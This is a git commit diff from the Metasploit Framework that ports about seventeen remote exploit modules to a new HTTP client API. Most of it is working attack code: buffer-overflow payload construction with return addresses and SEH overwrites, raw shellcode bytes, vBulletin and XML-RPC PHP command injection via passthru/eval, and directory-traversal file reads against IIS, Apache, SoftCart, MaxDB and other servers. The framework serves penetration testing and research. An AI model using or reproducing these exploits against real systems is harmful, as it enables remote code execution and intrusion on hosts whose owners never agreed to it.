Integration of the new HTTP Client API
git-svn-id: file:///home/svn/framework3/trunk@4241 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
e60e7bede3
commit
b221af7791
|
@ -59,8 +59,7 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def brute_exploit(address)
|
||||
print_status("Trying #{"%.8x" % address['Ret']}...")
|
||||
|
||||
|
||||
buffer =
|
||||
"MAA+scstoreB" +
|
||||
rand_text_alphanumeric(512) +
|
||||
|
@ -69,227 +68,14 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
|
|||
[address['Ret'] + payload.encoded.length].pack('V') +
|
||||
payload.encoded
|
||||
|
||||
connect('global' => true)
|
||||
|
||||
req = client.request(
|
||||
'uri' => datastore['URI'] + "?" + buffer)
|
||||
|
||||
client.send_request(req)
|
||||
print_status("Trying #{"%.8x" % address['Ret']}...")
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'],
|
||||
'query' => buffer
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be redistributed
|
||||
# according to the licenses defined in the Authors field below. In the
|
||||
# case of an unknown or missing license, this file defaults to the same
|
||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
||||
# version of the Framework can always be obtained from metasploit.com.
|
||||
##
|
||||
|
||||
package Msf::Exploit::mercantec_softcart;
|
||||
|
||||
use strict;
|
||||
use base "Msf::Exploit";
|
||||
|
||||
my $advanced =
|
||||
{
|
||||
'StackBottom' => [ '', 'Start address for stack ret.' ],
|
||||
'StackTop' => [ '', 'Stop address for stack ret.' ],
|
||||
'StackStep' => [ 0, 'Number of bytes to increment between steps.' ],
|
||||
'BruteWait' => [ 0, 'Number of seconds to wait between steps.' ],
|
||||
};
|
||||
|
||||
my $info =
|
||||
{
|
||||
'Name' => 'Mercantec SoftCart CGI Overflow',
|
||||
'Version' => '$Revision: 3110 $',
|
||||
'Authors' =>
|
||||
[
|
||||
'skape <mmiller [at] hick.org>',
|
||||
'trew <trew [at] exploit.us>'
|
||||
],
|
||||
|
||||
'Description' =>
|
||||
qq{
|
||||
This is an exploit for an undisclosed buffer overflow
|
||||
in the SoftCart.exe CGI as shipped with Mercantec's shopping
|
||||
cart software. It is possible to execute arbitrary code by
|
||||
passing a malformed CGI parameter in an HTTP GET request.
|
||||
This issue is known to affect SoftCart version 4.00b.
|
||||
},
|
||||
|
||||
'Arch' => [ 'x86' ],
|
||||
'OS' => [ 'bsdi' ],
|
||||
'Priv' => 0,
|
||||
|
||||
'UserOpts' =>
|
||||
{
|
||||
'RHOST' => [ 1, 'ADDR', 'The target HTTP server address' ],
|
||||
'RPORT' => [ 1, 'PORT', 'The target HTTP server port', 80 ],
|
||||
'VHOST' => [ 1, 'DATA', 'The target HTTP virtual host', 'auto' ],
|
||||
'URI' => [ 1, 'DATA', 'The target CGI URI', '/cgi-bin/SoftCart.exe' ],
|
||||
},
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000, # tons
|
||||
'MinNops' => 16,
|
||||
'BadChars'=> "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e" .
|
||||
"\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b" .
|
||||
"\x7d\x28\x29\x3f\x5d\x5b\x00",
|
||||
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
|
||||
},
|
||||
|
||||
'Refs' =>
|
||||
[
|
||||
['OSVDB', '9011'],
|
||||
['MIL', '38'],
|
||||
],
|
||||
|
||||
'DefaultTarget' => -1,
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
|
||||
# Name Bottom/Ret Top
|
||||
[ 'BSDi/4.3 Bruteforce', 0xefbf3000, 0xefbffffc ],
|
||||
[ 'BSDi/4.3', 0xefbf4b8e, 0x0 ],
|
||||
],
|
||||
|
||||
'Keys' => ['softcart'],
|
||||
|
||||
'DisclosureDate' => 'Aug 19 2004',
|
||||
};
|
||||
|
||||
sub new
|
||||
{
|
||||
my $class = shift;
|
||||
my $self;
|
||||
|
||||
$self = $class->SUPER::new(
|
||||
{
|
||||
'Info' => $info,
|
||||
'Advanced' => $advanced,
|
||||
},
|
||||
@_);
|
||||
|
||||
return $self;
|
||||
}
|
||||
|
||||
#
|
||||
# We must fork our child before doing fun stuff.
|
||||
#
|
||||
sub PayloadPrepend
|
||||
{
|
||||
my $self = shift;
|
||||
|
||||
return "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00" .
|
||||
"\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00" .
|
||||
"\x00\x07\x00";
|
||||
}
|
||||
|
||||
sub Exploit
|
||||
{
|
||||
my $self = shift;
|
||||
my $targetIdx = $self->GetVar('TARGET');
|
||||
my $payload = $self->GetVar('EncodedPayload');
|
||||
my $shellcode = $payload->Payload;
|
||||
my $target = $self->Targets->[$targetIdx];
|
||||
my $ret = $target->[1];
|
||||
my $valid;
|
||||
|
||||
$self->PrintLine('[*] Trying exploit target ' . $target->[0]);
|
||||
|
||||
if ($target->[0] =~ /Bruteforce/)
|
||||
{
|
||||
my $stackTop = hex($self->GetLocal('StackTop'));
|
||||
my $stackBottom = hex($self->GetLocal('StackBottom'));
|
||||
my $stackStep = $self->GetLocal('StackStep');
|
||||
my $wait = $self->GetLocal('BruteWait');
|
||||
|
||||
$stackBottom = $target->[1] if ($stackBottom == 0);
|
||||
$stackTop = $target->[2] if ($stackTop == 0);
|
||||
$stackStep = $payload->NopsLength if ($stackStep == 0);
|
||||
|
||||
$self->PrintLine(sprintf('[*] Brute forcing %.8x => %.8x (step %d)...',
|
||||
$stackBottom, $stackTop, $stackStep));
|
||||
|
||||
# Loop through addresses, incrementing by stackStep each interval
|
||||
for ($ret = $stackBottom, $valid = $ret + length($shellcode);
|
||||
$ret < $stackTop;
|
||||
$ret = $self->StepAddress(Address => $ret, StepSize => $stackStep, Direction => 1),
|
||||
$valid = $self->StepAddress(Address => $valid, StepSize => $stackStep, Direction => 1))
|
||||
{
|
||||
|
||||
# Wrap valid around if it goes past the top
|
||||
$valid = $stackBottom if ($valid >= $stackTop);
|
||||
|
||||
$self->PrintLine(sprintf("[*] Trying %.8x...", $ret));
|
||||
|
||||
last if (not defined($self->transmitExploit(target => $target,
|
||||
shellcode => $shellcode, ret => $ret, valid => $valid)));
|
||||
|
||||
sleep($wait);
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$valid = $ret + length($shellcode);
|
||||
|
||||
$self->transmitExploit(target => $target,
|
||||
shellcode => $shellcode, ret => $ret, valid => $valid);
|
||||
}
|
||||
}
|
||||
|
||||
sub transmitExploit
|
||||
{
|
||||
my $self = shift;
|
||||
my ($target, $shellcode, $ret, $valid) = @{{@_}}{qw/target shellcode ret valid/};
|
||||
my $targetHost = $self->GetVar('RHOST');
|
||||
my $targetPort = $self->GetVar('RPORT');
|
||||
my $vhost = $self->GetVar('VHOST');
|
||||
my $uri = $self->GetVar('URI');
|
||||
my $bof;
|
||||
my $s;
|
||||
|
||||
$vhost = $targetHost if (not defined($vhost) or $vhost eq 'auto');
|
||||
|
||||
# Build payload
|
||||
$bof = "MAA+scstoreB";
|
||||
$bof .= "A" x (524 - length($bof));
|
||||
$bof .= pack("V", $ret);
|
||||
$bof .= "MSF!";
|
||||
$bof .= pack("V", $valid);
|
||||
$bof .= $shellcode;
|
||||
|
||||
my $s = Msf::Socket::Tcp->new
|
||||
(
|
||||
'PeerAddr' => $targetHost,
|
||||
'PeerPort' => $targetPort,
|
||||
'LocalPort' => $self->GetVar('CPORT'),
|
||||
'SSL' => $self->GetVar('SSL'),
|
||||
);
|
||||
if ($s->IsError) {
|
||||
$self->PrintError;
|
||||
return;
|
||||
}
|
||||
|
||||
# << pow! >>
|
||||
$s->Send("GET $uri?$bof HTTP/1.0\r\n" .
|
||||
"Host: $vhost\r\n" .
|
||||
"\r\n");
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
1;
|
||||
|
||||
=end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -46,10 +46,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = request(
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => '/')
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
|
||||
if response and response['Server']
|
||||
print_status("Found RTSP: #{response['Server']}")
|
||||
|
@ -65,10 +67,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
|
|||
|
||||
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
|
||||
|
||||
request(
|
||||
res = send_request_raw({
|
||||
'method' => 'DESCRIBE',
|
||||
'proto' => 'RTSP/1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
@ -16,7 +16,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
|||
is enabled. All versions of vBulletin prior to 3.0.7 are
|
||||
affected.
|
||||
},
|
||||
'Author' => [ 'str0ke <str0ke@milw0rm.com>', 'cazz' ],
|
||||
'Author' => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' => [
|
||||
|
@ -46,22 +46,24 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
|||
|
||||
deregister_options(
|
||||
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def go(command)
|
||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
||||
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
|
||||
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
|
||||
|
||||
res = request({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
})
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
'vars_get' =>
|
||||
{
|
||||
'do' => "page",
|
||||
'template' => "{${passthru(#{encoded})}}"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
if (res and res.body)
|
||||
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
|
||||
|
|
|
@ -67,12 +67,12 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
|
|||
"</param></params>" +
|
||||
"</methodCall>";
|
||||
|
||||
res = request({
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'POST',
|
||||
'Content-Type' => 'application/xml',
|
||||
'ctype' => 'application/xml',
|
||||
'data' => xml,
|
||||
})
|
||||
}, 5)
|
||||
|
||||
|
||||
if (res and res.body)
|
||||
|
|
|
@ -50,11 +50,9 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|||
|
||||
# Identify the target based on the WebAdmin version number
|
||||
def autofilter
|
||||
c = connect
|
||||
|
||||
req = c.request({ 'uri' => '/WebAdmin.DLL' })
|
||||
res = c.send_request(req, -1)
|
||||
disconnect
|
||||
res = send_request_raw({
|
||||
'uri' => '/WebAdmin.DLL'
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
|
||||
case $1
|
||||
|
@ -78,29 +76,28 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
user_cook = Rex::Text.rand_text_alphanumeric(2)
|
||||
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
|
||||
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
|
||||
|
||||
req = c.request({
|
||||
'uri' => '/WebAdmin.DLL?View=Logon',
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/WebAdmin.DLL',
|
||||
'query' => 'View=Logon',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
|
||||
'data' => post_data,
|
||||
})
|
||||
'headers' =>
|
||||
{
|
||||
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
|
||||
'Accept-Language' => 'en',
|
||||
'Accept-Charset' => 'iso-8859-1,*,utf-8'
|
||||
}
|
||||
}, 5)
|
||||
|
||||
req.headers['Accept'] = 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png'
|
||||
req.headers['Accept-Language'] = 'en'
|
||||
req.headers['Accept-Charset'] = 'iso-8859-1,*,utf-8'
|
||||
|
||||
print_status("Sending request...")
|
||||
res = c.send_request(req)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -230,16 +230,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
|
|||
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
|
||||
|
||||
# Build the request
|
||||
request(
|
||||
send_request_raw({
|
||||
'uri' => '/',
|
||||
'headers' =>
|
||||
{
|
||||
'Host' => "#{vhost}:#{rport}",
|
||||
'Transfer-Encoding' => "CHUNKED"
|
||||
},
|
||||
'data' => "FFFFFFF0 " + pattern,
|
||||
'timeout' => 2
|
||||
)
|
||||
}, 2)
|
||||
|
||||
# Check the handler
|
||||
handler
|
||||
|
|
|
@ -52,12 +52,13 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
|
|||
def exploit
|
||||
print_status("Sending request...")
|
||||
|
||||
request(
|
||||
send_request_raw({
|
||||
'uri' =>
|
||||
"/" + ("o" * target['Length']) +
|
||||
"META" +
|
||||
[target.ret].pack('V') +
|
||||
payload.encoded)
|
||||
payload.encoded
|
||||
}, 2)
|
||||
|
||||
handler
|
||||
end
|
||||
|
|
|
@ -52,27 +52,27 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
|||
def exploit
|
||||
c = connect
|
||||
|
||||
num = rand(65535).to_s
|
||||
num = rand(65535).to_s
|
||||
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
|
||||
|
||||
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
|
||||
req << "page=notify&origname=&action=return&type=Beeper&instancename="
|
||||
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
|
||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||
|
||||
req = c.request({
|
||||
print_status("Trying target %s..." % target.name)
|
||||
res = send_request_cgi({
|
||||
'uri' => '/_maincfgret.cgi',
|
||||
'method' => 'POST',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'data' => req,
|
||||
})
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
|
||||
}
|
||||
}, 5)
|
||||
|
||||
print_status("Trying target %s..." % target.name)
|
||||
|
||||
res = c.send_request(req)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -59,8 +59,6 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
# Trigger the SEH by writing past the end of the page after
|
||||
# the SEH is already overwritten. This avoids the other smashed
|
||||
# pointer exceptions and goes straight to the payload.
|
||||
|
@ -71,10 +69,12 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
|
|||
buf[3647, 4] = [target.ret].pack('V')
|
||||
|
||||
print_status("Trying target address 0x%.8x..." % target.ret)
|
||||
res = c.send_request(c.request({ 'uri' => '/%' + buf }), -1)
|
||||
|
||||
send_request_raw({
|
||||
'uri' => '/%' + buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -55,17 +55,16 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
||||
uri << [target['Rets'][1]].pack('V')
|
||||
uri << payload.encoded
|
||||
|
||||
print_status("Trying target address 0x%.8x..." % target['Rets'][1])
|
||||
res = c.send_request(c.request({ 'uri' => uri }), -1)
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -57,7 +57,10 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
r = request('uri' => '/')
|
||||
r = send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
return Exploit::CheckCode::Safe if not r
|
||||
|
||||
m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
|
||||
|
@ -86,7 +89,9 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
|
|||
uri << '#0100x.mp3'
|
||||
|
||||
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
|
||||
res = request({ 'uri' => uri })
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
|
@ -67,9 +67,10 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3' })
|
||||
res = c.send_request(req, -1)
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/ComGetLogFile.php3',
|
||||
'query' => 'fn=../HTTPRoot/socket.php3'
|
||||
}, 5)
|
||||
|
||||
if (res and res.body =~ /fsockopen/)
|
||||
fp = fingerprint()
|
||||
|
@ -86,19 +87,22 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
|
|||
seh = generate_seh_payload(target.ret)
|
||||
buf[257, seh.length] = seh
|
||||
|
||||
uri = "/tuner/TunerGuide.php3?userID=#{buf}"
|
||||
|
||||
print_status("Sending request...")
|
||||
res = c.send_request(c.request({ 'uri' => uri }), -1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/TunerGuide.php3',
|
||||
'query' => 'userID=' + buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def download(path)
|
||||
c = connect
|
||||
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path })
|
||||
res = c.send_request(req, -1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/tuner/ComGetLogFile.php3',
|
||||
'query' => 'fn=' + ("../" * 10) + path
|
||||
}, 5)
|
||||
|
||||
return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)
|
||||
|
||||
m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
|
||||
|
|
|
@ -75,7 +75,13 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
||||
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
||||
|
||||
response = request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, 5)
|
||||
response = send_request_cgi({
|
||||
'uri' => '/' + uri,
|
||||
'ctype' => 'text/xml',
|
||||
'method' => 'SEARCH',
|
||||
'data' => xml
|
||||
}, 5)
|
||||
|
||||
|
||||
if (response and response.body =~ /Server Error\(exception/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -83,7 +89,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
|
||||
# Did the server stop acceping requests?
|
||||
begin
|
||||
request({ 'uri' => '/'} )
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
rescue
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
@ -93,7 +99,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# verify the service is running up front
|
||||
request({'uri' => '/'})
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
if datastore['HTTP::junk_pipeline'] > 0
|
||||
print_status('junk pipelined exploitation requests may not work. If exploitation fails, try disabling pipelining')
|
||||
|
@ -139,10 +145,15 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
url[ 283, 2 ] = ret
|
||||
|
||||
begin
|
||||
request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, nil)
|
||||
send_request_cgi({
|
||||
'uri' => url,
|
||||
'ctype' => 'text/xml',
|
||||
'method' => 'SEARCH',
|
||||
'data' => xml
|
||||
}, 5)
|
||||
handler
|
||||
rescue => e
|
||||
print_error("attempt failed: #{e.to_s}")
|
||||
print_error("Attempt failed: #{e.to_s}")
|
||||
end
|
||||
|
||||
1.upto(8) { |i|
|
||||
|
@ -163,7 +174,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
|||
print_status('Checking if IIS is back up after a failed attempt...')
|
||||
1.upto(20) {|i|
|
||||
begin
|
||||
request({'uri' => '/'})
|
||||
send_request_raw({'uri' => '/'}, 5)
|
||||
rescue
|
||||
print_status("Connection failed (#{i} of 20)...")
|
||||
sleep(2)
|
||||
|
|
|
@ -70,23 +70,23 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
|||
|
||||
if (i % 3 == 0)
|
||||
print_status("Refreshing the remote DLLHost.exe process...")
|
||||
c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
|
||||
send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
end
|
||||
|
||||
print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)")
|
||||
send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'method' => 'POST',
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => 'Chunked'
|
||||
},
|
||||
'data' => "DEAD\r\n#{pat}\r\n0\r\n"
|
||||
}, 5)
|
||||
|
||||
c.connect
|
||||
s = c.conn
|
||||
|
||||
print_status("Trying to exploit fp30reg.dll (#{i.to_s} of 15)")
|
||||
|
||||
req =
|
||||
"POST #{datastore['URL']} HTTP/1.1\r\n" +
|
||||
"Host: #{datastore['VHOST'] || datastore['RHOST']}\r\n" +
|
||||
"Transfer-Encoding: Chunked\r\n\r\n" +
|
||||
"DEAD\r\n" +
|
||||
pat + "\r\n" +
|
||||
"0\r\n"
|
||||
|
||||
s.put(req)
|
||||
sock.put(req)
|
||||
sleep(1)
|
||||
|
||||
handler
|
||||
|
@ -95,10 +95,10 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
print_status("Refreshing the remote DLLHost.exe process...")
|
||||
r = c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
|
||||
disconnect
|
||||
print_status("Requesting the vulnerable ISAPI path...")
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (r and r.code == 501)
|
||||
return Exploit::CheckCode::Detected
|
||||
|
|
|
@ -58,9 +58,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /NetShow ISAPI/)
|
||||
return Exploit::CheckCode::Detected
|
||||
|
@ -70,9 +70,7 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
|
||||
def exploit_target(target)
|
||||
|
||||
c = connect
|
||||
|
||||
buf = ''
|
||||
vars = {}
|
||||
%w{
|
||||
date time c-dns cs-uri-stem c-starttime
|
||||
x-duration c-rate c-status c-playerid c-playerversion
|
||||
|
@ -86,17 +84,15 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|||
pat[ target['Rets'][0] - 4, seh.length] = seh
|
||||
buf << pat
|
||||
|
||||
req = c.request({
|
||||
print_status("Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URL'],
|
||||
'method' => 'POST',
|
||||
'user-agent' => 'NSPlayer/2.0',
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
'data' => buf,
|
||||
})
|
||||
|
||||
print_status("Sending request...")
|
||||
c.send_request(req, 0)
|
||||
|
||||
'data' => buf
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
|
@ -62,8 +62,11 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
r = c.send_request(c.request({ 'uri' => datastore['URL'] + '?GetPic?image=msf' }))
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => 'GetPic?image=msf'
|
||||
}, -1)
|
||||
|
||||
if (r and r.body and r.body =~ /RSA Web Access Authentication/)
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
@ -71,14 +74,16 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A')
|
||||
|
||||
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
|
||||
seh = generate_seh_payload(target['Rets'][1])
|
||||
pat[target['Rets'][0]-4, seh.length] = seh
|
||||
|
||||
c.send_request(c.request({ 'uri' => datastore['URL'] + '?Redirect?url=' + pat }))
|
||||
|
||||
|
||||
r = send_request_raw({
|
||||
'uri' => datastore['URL'],
|
||||
'query' => 'Redirect?url=' + pat
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
|
|
@ -59,11 +59,9 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|||
|
||||
# Identify the target based on the IIS version
|
||||
def autofilter
|
||||
c = connect
|
||||
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
disconnect
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
|
@ -82,36 +80,32 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
c = connect
|
||||
req = c.request({ 'uri' => datastore['URL'] })
|
||||
res = c.send_request(req, -1)
|
||||
|
||||
require 'pp'
|
||||
pp res
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
c = connect
|
||||
|
||||
|
||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
||||
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
url = datastore['URL'] + '?' + buf
|
||||
req = c.request({ 'uri' => url })
|
||||
|
||||
print_status("Sending request...")
|
||||
c.send_request(req, 0)
|
||||
|
